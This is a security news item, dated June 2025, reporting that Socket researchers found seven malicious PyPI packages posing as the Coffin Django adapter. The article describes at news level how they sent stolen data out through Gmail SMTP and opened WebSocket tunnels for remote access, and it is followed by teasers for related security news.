Malicious Python packages exploit Gmail and WebSockets

📟 News

Date: 06/05/2025

Socket’s Threat Research Team discovered seven malicious Python packages that use Gmail SMTP servers and WebSockets for data exfiltration and remote command execution.

Socket analysts reported their findings to the Python Package Index (PyPI), and malicious packages were removed from it. However, some of them had been present on PyPI for more than four years, and one package was downloaded more than 18,000 times.

Malware was identified in the following packages:

  • Coffin-Codes-Pro (9000 downloads);
  • Coffin-Codes-NET2 (6200 downloads);
  • Coffin-Codes-NET (6100 downloads);
  • Coffin-Codes-2022 (18,100 downloads);
  • Coffin2022 (6500 downloads);
  • Coffin-Grave (6500 downloads); and 
  • cfc-bsb (2900 downloads).

The malicious Coffin packages pose as the legitimate Coffin adapter that integrates Jinja2 templates into Django projects.

Their malicious functionality includes covert remote access and data exfiltration via Gmail.

The packages use hardcoded credentials to log into the Gmail SMTP server (smtp.gmail.com) and transmit information collected on victim hosts to their operators, thus, enabling them to remotely access compromised systems. Since Gmail is a trusted resource, firewalls and EDR systems are unlikely to consider such activity suspicious.

After sending the stolen data by email, the malware connects to the remote server over SSL using WebSocket and receives instructions on setting up an encrypted bidirectional tunnel from the host to the attacker.

Using the Client class, the malware tunnels traffic from the remote host to the local system to provide access to the internal admin panel and API and perform such operations as file transfer, email theft, execution of shell commands, collection of credentials, and lateral movement.

Based on the email addresses used (e.g. blockchain.bitcoins2020@gmail.com), Socket analysts conclude that the primary purpose of the malicious packages is to steal cryptocurrency, especially taking that similar tactics were previously used to steal Solana private keys.

Related posts:
2025.03.05 — Polish Space Agency disconnects its network due to hacker attack

Last weekend, the Polish Space Agency (POLSA) had to disconnect all of its systems from the Internet to localize an attack targeting its IT infrastructure. After discovering the intrusion,…

Full article →
2025.04.25 — Asus patches vulnerability in AMI's MegaRAC enabling attackers to brick servers

Asus released patches for the CVE-2024-54085 vulnerability that allows attackers to seize and disable servers. The security hole affects the American Megatrends International (AMI) MegaRAC Baseboard Management…

Full article →
2025.04.04 — Privilege escalation vulnerability in Google Cloud resulting in sensitive data leaks finally patched

Tenable Research revealed details of a recently patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run enabling an attacker to gain access to container images…

Full article →
2025.03.10 — Nearly a million Windows computers impacted by a malvertising campaign

According to Microsoft, nearly 1 million Windows devices fell victim to a sophisticated malvertising campaign in recent months. Cybercriminals were able to steal credentials, cryptocurrency, and sensitive…

Full article →
2025.02.23 — New JavaScript obfuscation technique uses invisible Unicode characters

According to Juniper Threat Labs , a new JavaScript obfuscation technique that uses invisible Unicode characters was used in a phishing attack targeting Political Action…

Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store

According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…

Full article →
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members

The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…

Full article →
2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains

watchTowr discovered plenty of abandoned Amazon S3 buckets that could be used by attackers to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…

Full article →
2025.03.07 — YouTube warns of scam video featuring its CEO

According to YouTube, scammers use an AI-generated video of the company's CEO in phishing attacks to steal user credentials. The scammers attack content creators by sending them…

Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks

Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…

Full article →